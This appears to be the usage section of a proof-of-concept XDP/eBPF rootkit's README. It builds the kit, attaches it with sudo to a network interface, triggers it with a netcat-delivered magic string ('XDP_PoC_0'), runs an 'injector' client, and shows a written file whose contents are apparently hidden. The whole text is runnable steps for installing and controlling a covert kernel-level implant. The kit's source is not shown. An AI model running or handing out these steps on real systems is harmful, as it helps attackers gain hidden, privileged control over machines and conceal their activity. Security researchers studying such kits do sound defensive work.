cd src
make
sudo ./bin/kit -t <network interface>
Network interface used for PoC: lo
Terminal 1:
nc -l 9000
Terminal 2:
echo -n "XDP_PoC_0" | nc 127.0.0.1 9000
cd src/client
sudo ./injector -S 127.0.0.1
echo "This won't be seen" > /tmp/txt.txt
cat /tmp/txt.txt